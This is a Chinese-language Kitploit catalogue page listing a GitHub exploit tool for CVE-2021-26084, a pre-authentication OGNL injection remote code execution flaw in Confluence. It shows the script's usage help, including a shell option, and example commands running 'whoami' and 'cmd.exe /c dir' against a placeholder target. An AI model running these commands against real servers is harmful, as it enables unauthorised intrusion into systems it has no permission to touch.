Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26084_Confluence — CVE-2021-26084 - Confluence预认证RCE OGNL注入回显 | Kitploit
工具/GitHubGitHub/prettyrecon/cve-2021-26084_confluence
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubprettyrecon/cve-2021-26084_confluence

CVE-2021-26084_Confluence

CVE-2021-26084 - Confluence预认证RCE OGNL注入回显

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
132465年前尚未审核
分享

CVE-2021-26084 - Confluence 预授权 RCE OGNL 注入

使用方法

  • root@kitploit:~
    usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell]
    
    CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
    
    optional arguments:
      -h, --help         show this help message and exit
      --url URL, -u URL  Target Url
      --cmd CMD, -c CMD  Command
      --shell            Get shell
    
  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "whoami"
    

    1630484082986

  • root@kitploit:~
    python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "cmd.exe /c dir"
    

    1630484112292

参考:

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

下载工具